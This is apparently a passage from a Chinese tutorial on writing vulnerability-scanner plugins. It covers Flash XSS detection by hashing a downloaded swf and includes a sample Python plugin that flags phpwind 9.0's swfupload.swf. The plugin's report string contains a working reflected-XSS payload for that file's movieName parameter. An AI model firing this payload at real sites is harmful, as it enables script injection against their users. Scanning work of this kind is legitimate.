• Flash XSS
    • 实例:

    Flash XSS

    这一类的 XSS 主要是由于 Flash 与 Js 交互过程中产生的 XSS。

    检测方法:校验 flash 的 hash 值(例如: md5)

    实例:

    phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS漏洞

    由于 Flash 文件是可以下载到客户端,所以直接下载该 swf 文件,校验其 hash。根据漏洞详情,可知该 swf 文件路径为: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

    范例插件

    PHPWind 9.0 swfupload.swf Flash XSS

    感谢插件作者: xyw55

    1. #!/usr/bin/env python
    2. # coding:utf-8
    3. # @Date    : 2015-06-28
    4. # @Author  : xyw55 (xyw5255@163.com)
    6. '''
    7. phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf xss漏洞 POC
    8. refer : http://wooyun.org/bugs/wooyun-2013-017731
    9. '''
    10. import md5
    13. def assign(service, arg):
    14.     if service == fingerprint.phpwind:
    15.         return True, arg
    17. def audit(arg):
    18.     flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
    19.     file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
    20.     url = arg
    21.     verify_url = url + file_path
    23.     code, head, res, redirect_url, log = hackhttp.http(verify_url)
    24.     if code == 200:
    25.         md5_value = md5.new(res).hexdigest()
    26.         if md5_value in flash_md5:
    27.             # info 中不要传 log
    28.             security_info(url + ' phpwind Reflected XSS; plaload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')
    31. if __name__ == '__main__':
    32.     from dummy import *
    33.     audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])